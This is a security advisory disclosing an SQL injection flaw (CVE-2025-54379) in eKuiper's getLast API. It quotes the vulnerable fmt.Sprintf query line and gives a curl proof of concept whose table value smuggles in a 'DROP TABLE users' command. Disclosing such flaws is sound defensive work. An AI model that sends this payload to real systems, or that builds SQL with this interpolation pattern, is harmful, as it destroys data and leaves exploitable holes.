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eKuiper API endpoints handling SQL queries with user-controlled table names.

High
ngjaying published GHSA-526j-mv3p-f4vv Jul 24, 2025

Package

No package listed

Affected versions

v2.1.5

Patched versions

v2.2.1

Description

Summary

A critical SQL Injection vulnerability exists in the getLast API functionality of the eKuiper project. This flaw allows unauthenticated remote attackers to execute arbitrary SQL statements on the underlying SQLite database by manipulating the table name input in an API request. Exploitation can lead to data theft, corruption, or deletion, and full database compromise.

Details

The root cause lies in the use of unsanitized user-controlled input when constructing SQL queries using fmt.Sprintf, without validating the table parameter. Specifically, in:

query := fmt.Sprintf("SELECT * FROM %s ORDER BY rowid DESC LIMIT 1", table)

Any value passed as the table parameter is directly interpolated into the SQL string, enabling injection attacks. This is reachable via API interfaces that expose time-series queries.

PoC

  1. Deploy eKuiper instance (default config is sufficient).
  2. Send a crafted request to the SQL query endpoint:
   curl -X POST http://localhost:9081/sql-query \
     -H "Content-Type: application/json" \
     -d '{
       "table": "sensors; DROP TABLE users; --",
       "operation": "getLast"
     }'
  1. Effect: Executes two SQL queries — the first selects data, the second drops the users table.
  2. Verify Result:
   sqlite3 etc/kuiper/data/kuiper.db ".tables"

Impact

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Refferences

Severity

High

CVE ID

CVE-2025-54379

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Learn more on MITRE.

Credits